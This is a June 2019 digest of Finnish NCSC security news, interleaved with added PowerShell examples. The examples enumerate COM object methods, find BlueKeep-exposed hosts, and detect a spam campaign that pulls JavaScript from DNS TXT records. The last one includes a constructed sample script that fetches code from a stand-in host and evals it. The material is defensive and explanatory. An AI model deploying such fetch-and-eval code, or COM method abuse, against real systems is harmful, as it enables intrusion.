Daily NCSC-FI news followup 2019-06-11

Wi-Fi in the office convenient but risky

www.kaspersky.com/blog/vulnerable-wi-fi/27250/ Almost every office has a Wi-Fi network today, and sometimes more than one. Who wants to connect laptops with a cable? And forget about smartphones and tablets! However, a wireless network can be a weak point in your IT infrastructure. Not all companies use complex and unique passwords for their wireless networks, and few bother to disable broadcasting of the network's name. Fewer still limit the power of the Wi-Fi signal to prevent connections from outside the office. Thus, usually little prevents a potential attacker from hanging around near the office and trying to get into the corporate network through a Wi-Fi connection.

Hunting COM Objects (Part Two)

www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html As a follow-up to Part One in this blog series on COM object hunting, this post takes the COM object hunting methodology deeper by looking at interesting COM object methods exposed through the properties and sub-properties of COM objects.
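The walk the post describes, as an added example that is not code from the FireEye post: instantiate a COM object by ProgID, list its methods, then descend into each plain property that returns another COM object and repeat, to a fixed depth. The ProgID used at the bottom, the depth and the list of "interesting" method-name fragments are assumptions for illustration.

```powershell
# Added example, not code from the FireEye post. Walks a COM object's
# properties and sub-properties to a fixed depth and reports the methods
# exposed at each level, flagging names that suggest code or file execution.
# ProgIDs, the depth and the keyword list are assumptions for illustration.

function Get-ComMethodTree {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ProgId,
        [int] $MaxDepth = 2,
        # Name fragments worth a second look (assumed list; extend as needed)
        [string[]] $Interesting = @('Exec', 'Run', 'Shell', 'Navigate', 'Create', 'Write', 'Save', 'Open', 'Load')
    )

    $root = New-Object -ComObject $ProgId
    # IUnknown pointer -> object already visited. Properties such as .Application
    # or .Parent hand back an object higher up the tree and would recurse forever.
    # Storing the object as the value keeps it alive, so its pointer is not reused.
    $seen = @{}

    function Walk($obj, [string] $path, [int] $depth) {
        $punk = [System.Runtime.InteropServices.Marshal]::GetIUnknownForObject($obj)
        try {
            if ($seen.ContainsKey($punk)) { return }
            $seen[$punk] = $obj
        } finally {
            [void][System.Runtime.InteropServices.Marshal]::Release($punk)
        }

        # Get-Member reads the IDispatch type information, so this works on
        # late-bound System.__ComObject instances without an interop assembly.
        $members = @($obj | Get-Member -ErrorAction SilentlyContinue)

        foreach ($m in $members | Where-Object MemberType -eq 'Method') {
            $hit = @($Interesting | Where-Object { $m.Name -like "*$_*" })
            [pscustomobject]@{
                Path        = "$path.$($m.Name)"
                Definition  = $m.Definition
                Interesting = ($hit.Count -gt 0)
            }
        }

        if ($depth -ge $MaxDepth) { return }

        # Plain (non-parameterized) properties that return another COM object
        # are the sub-properties worth descending into.
        foreach ($p in $members | Where-Object MemberType -eq 'Property') {
            $child = $null
            try { $child = $obj.($p.Name) } catch { continue }
            if ($child -is [System.__ComObject]) {
                Walk $child "$path.$($p.Name)" ($depth + 1)
            }
        }
    }

    try {
        Walk $root $ProgId 0
    } finally {
        [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($root)
    }
}

# Usage: flagged methods reachable from Shell.Application two levels deep
Get-ComMethodTree -ProgId 'Shell.Application' -MaxDepth 2 |
    Where-Object Interesting |
    Format-Table Path, Definition -AutoSize
```

Parameterized properties (those needing an index, like Item) are reported by Get-Member as ParameterizedProperty and are deliberately skipped, since reading them without arguments throws; raise MaxDepth carefully, because the property graph of shell and Office objects fans out quickly.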

Equifax is still paying for its data breach: $1.4 billion and counting

www.pandasecurity.com/mediacenter/news/equifax-rating-lowered/ In September 2017, the credit score company Equifax announced that it had become the victim of one of the largest data breaches of all time. Although it wasn't the largest (that dubious honor goes to Yahoo, which lost details of around 3 billion accounts in 2013), the Equifax data breach saw the data of around 145 million US consumers exposed, along with that of millions of people from other countries.

Microsoft June 2019 Security Updates

portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/253dc509-9a5b-e911-a98e-000d3a33c573 Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. Also:

thehackernews.com/2019/06/windows-june-updates.html Also:

isc.sans.edu/forums/diary/MSFT+June+2019+Patch+Tuesday/25024/

CYBER ACTORS EXPLOIT ‘SECURE’ WEBSITES IN PHISHING CAMPAIGNS

www.ic3.gov/media/2019/190610.aspx Websites with addresses that start with https are supposed to provide privacy and security to visitors. After all, the "s" stands for "secure" in HTTPS: Hypertext Transfer Protocol Secure. In fact, cyber security training has focused on encouraging people to look for the lock icon that appears in the web browser address bar on these secure sites. The presence of https and the lock icon are supposed to indicate the web traffic is encrypted a

Adobe Issues Critical Patches for ColdFusion, Flash Player, Campaign

thehackernews.com/2019/06/adobe-patch-june.html It's Patch Tuesday week! Adobe has just released its June 2019 software updates to address a total of 11 security vulnerabilities in three widely used products: Adobe ColdFusion, Flash Player, and Adobe Campaign. Of these, three vulnerabilities affect Adobe ColdFusion, a commercial rapid web application development platform, all critical in severity, and could lead to arbitrary code execution.

How Ursnif Evolves to Keep Threatening Italy

blog.yoroi.company/research/how-ursnif-evolves-to-keep-threatening-italy/ For months Italian users have been targeted by waves of malspam delivering infamous Ursnif variants. Yoroi-Cybaze ZLab closely observed these campaigns and analyzed them to track the evolution of the techniques and the underlying infection chain, noticing increasing sophistication. For instance, the latest waves improved their target selectivity by implementing various country checks, and their anti-analysis capabilities through heavy code obfuscation.

Cyberattack exposes travelers' photos, says US border agency

www.welivesecurity.com/2019/06/11/cyberattack-travelers-photos-usa-cbp/ The United States Customs and Border Protection (CBP) has announced that a security incident at one of its subcontractors has compromised the photos of thousands of travelers entering and departing the country. In addition to the photos of people's faces, the stolen data also includes images showing the license plates of the cars they used for entering and exiting the US. The data had been collected by CBP over a period of one and a half months as the travelers crossed an unspecified border point, according to The Washington Post, which broke the news.

Linux Command-Line Editors Vulnerable to High-Severity Bug

threatpost.com/linux-command-line-editors-high-severity-bug/145569/ A high-severity bug impacting two popular command-line text editors, Vim and Neovim, allows remote attackers to execute arbitrary OS commands. Security researcher Armin Razmjou warned that exploiting the bug is as easy as tricking a target into opening a specially crafted text file in either editor. Razmjou outlined his research and created a proof-of-concept (PoC) attack demonstrating how an adversary can compromise a Linux system via Vim or Neovim. He said Vim versions before 8.1.1365 and Neovim versions before 0.3.6 are vulnerable to arbitrary code execution.

‘RAMBleed’ Rowhammer attack can now steal data, not just alter it

www.zdnet.com/article/rambleed-rowhammer-attack-can-now-steal-data-not-just-alter-it A team of academics from the US, Austria, and Australia has published new research today detailing yet another variation of the Rowhammer attack. The novelty in this new Rowhammer variety, which the research team has named RAMBleed, is that it can be used to steal information from a targeted device, as opposed to altering existing data or elevating an attacker's privileges, as all previous Rowhammer attacks have done.

Electronic voting machine manufacturer does not itself trust the security of its machines

www.tivi.fi/uutiset/tv/ad7b686d-448c-4f9d-a2f0-06c074f5969b Voting machine manufacturer Election Systems & Software has decided to stop selling paperless voting machines as primary voting equipment, TechCrunch reports. The company's CEO Tom Burt explains the decision by saying that an election should have a paper record in case of errors and misuse.

Wave of intrusions in Finland: attackers break in through the mail server

www.tivi.fi/uutiset/tv/584c6521-3034-41e7-a767-612e3dc9cce5 The National Cyber Security Centre warns of a vulnerability in the Exim mail server that allows commands to be executed on the system. The Centre says it has received several reports from Finland of intrusions in which information systems were compromised through the Exim mail server vulnerability. The vulnerability is also being actively exploited elsewhere in the world.

Finding Windows Systems Affected by BlueKeep Remote Desktop Bug

www.bleepingcomputer.com/news/security/finding-windows-systems-affected-by-bluekeep-remote-desktop-bug/ On last month's Patch Tuesday, Microsoft announced that a vulnerability had been discovered in Remote Desktop Services that could allow wormable malware, such as ransomware, to propagate easily through vulnerable systems. This vulnerability, now known as BlueKeep, was given the ID CVE-2019-0708 and affects Windows 7, Windows Server 2008 R2, Windows Server 2008, Windows XP, and Windows Server 2003. Due to its severity, Microsoft released patches for all supported versions of Windows as well as for Windows XP and Windows Server 2003, which no longer receive security updates.
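A first-pass inventory check for the affected versions listed above, as an added example that is not the scanner the article describes: it pulls enabled computer accounts from Active Directory, keeps the OS names Microsoft lists as affected, and tests whether each host accepts a TCP connection on the RDP port. A host that shows up here may already be patched; the list only tells you where to confirm patch state first. It assumes the ActiveDirectory module (RSAT) and network reachability from the machine running it.

```powershell
# Added example, not the scanner described in the article. Pulls enabled
# computer accounts from Active Directory, keeps the OS versions Microsoft
# lists as affected by CVE-2019-0708, and checks whether each one accepts
# a TCP connection on the RDP port. Assumes the ActiveDirectory module
# (RSAT) and network reachability from the host running it; the OS name
# fragments and the port are the only inputs.

function Find-BlueKeepCandidate {
    [CmdletBinding()]
    param(
        # Affected versions per the advisory; 'Windows Server 2008' also covers R2
        [string[]] $AffectedOS = @('Windows 7', 'Windows Server 2008', 'Windows XP', 'Windows Server 2003'),
        [int] $Port = 3389
    )

    # One alternation of literal OS names; Escape keeps dots and spaces literal
    $pattern = ($AffectedOS | ForEach-Object { [regex]::Escape($_) }) -join '|'

    Get-ADComputer -Filter 'Enabled -eq $true' -Properties OperatingSystem, LastLogonDate |
        Where-Object { $_.OperatingSystem -match $pattern } |
        ForEach-Object {
            $target = if ($_.DNSHostName) { $_.DNSHostName } else { $_.Name }
            # -InformationLevel Quiet returns a plain boolean for the TCP test
            $open = Test-NetConnection -ComputerName $target -Port $Port `
                        -InformationLevel Quiet -WarningAction SilentlyContinue
            [pscustomobject]@{
                Name         = $_.Name
                OS           = $_.OperatingSystem
                LastLogon    = $_.LastLogonDate
                RdpReachable = $open
            }
        }
}

# Usage: hosts that answer on 3389 go to the top of the patch/verify list
Find-BlueKeepCandidate | Sort-Object RdpReachable -Descending | Format-Table -AutoSize
```

Hosts that are reachable on 3389 and not yet confirmed patched should also be checked for Network Level Authentication, which the advisory names as a partial mitigation, while the update is rolled out.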

New Spam Campaign Controlled by Attackers via DNS TXT Records

www.bleepingcomputer.com/news/security/new-spam-campaign-controlled-by-attackers-via-dns-txt-records/ A new finance spam campaign with HTML attachments has been discovered that uses Google's public DNS resolver to retrieve JavaScript commands embedded in a domain's TXT record. These commands then redirect the user's browser to an aggressive trading advertisement site, which has been reported as a scam. According to MyOnlineSecurity.com, which discovered this campaign, it is targeted at people in the United Kingdom, and the associated IP addresses have previously been used by the Necurs botnet.
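Two checks a triager can run on such an attachment, as an added example that is not code from the MyOnlineSecurity write-up: find script in the HTML that calls Google's JSON resolver endpoint for a TXT record and pull out the domain it queries, and decode what a resolver answer of that shape hands back to the script. The sample attachment and the sample resolver reply are constructed for illustration, and the exact URL format the campaign uses is an assumption; the Google JSON API's response shape (Status, Answer, type 16 for TXT, quoted data) is the documented one.

```powershell
# Added example, not code from the MyOnlineSecurity write-up. The sample
# attachment and resolver reply below are constructed; the URL format the
# campaign uses is an assumption.

function Find-DohTxtLookup {
    param([Parameter(Mandatory)] [string] $Content)
    # dns.google.com/resolve or dns.google/resolve, with type=TXT (or 16)
    # somewhere in the query string, in either parameter order.
    $rx = [regex]'dns\.google(?:\.com)?/resolve\?(?=[^"''\s]*\btype=(?:TXT|16)\b)[^"''\s]*\bname=([A-Za-z0-9.-]+)'
    foreach ($m in $rx.Matches($Content)) { $m.Groups[1].Value }
}

function Get-TxtPayload {
    param([Parameter(Mandatory)] [string] $DohJson)
    $resp = $DohJson | ConvertFrom-Json
    if ($resp.Status -ne 0 -or -not $resp.Answer) { return }
    foreach ($a in $resp.Answer) {
        if ($a.type -ne 16) { continue }      # 16 = TXT
        # The JSON API returns the record body wrapped in quotes; strip them
        $a.data.Trim('"')
    }
}

# Constructed sample: an HTML attachment that fetches its next step from DNS
$sampleHtml = @'
<html><body><script>
var x = new XMLHttpRequest();
x.open("GET", "https://dns.google.com/resolve?name=example.invalid&type=TXT");
x.onload = function () {
  var r = JSON.parse(x.responseText);
  eval(r.Answer[0].data.replace(/"/g, ""));
};
x.send();
</script></body></html>
'@

# Constructed sample: what the resolver would return for that query
$sampleReply = @'
{"Status":0,"TC":false,"Answer":[{"name":"example.invalid.","type":16,"TTL":300,
 "data":"\"window.location='https://example.invalid/offer'\""}]}
'@

$domains = @(Find-DohTxtLookup -Content $sampleHtml)
"Domains queried for TXT via Google DoH: $($domains -join ', ')"
"Payload the script would eval: $(Get-TxtPayload -DohJson $sampleReply)"

# Live follow-up (needs network): see what those domains currently serve
# foreach ($d in $domains) { Resolve-DnsName -Name $d -Type TXT | Select-Object Name, Strings }
```

The same pattern applied to proxy or DNS-over-HTTPS logs (requests to dns.google with type=TXT originating from a browser rather than a resolver) gives a cheap detection for the technique itself, independent of the particular domain the campaign rotates through.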

FIN8 hackers return after two years with attacks against hospitality sector

www.zdnet.com/article/fin8-hackers-return-after-two-years-with-attacks-against-hospitality-sector/ Two years after the last report on the activities of the FIN8 hacking group, security researchers say they’ve spotted the elusive hackers attempting new attacks against companies in the hospitality sector. FIN8, as its “FIN” codename indicates, is a group of hackers focused on attacks for their own financial benefit, as opposed to APT (advanced persistent threat) groups that are focused on intelligence gathering and cyber-espionage.
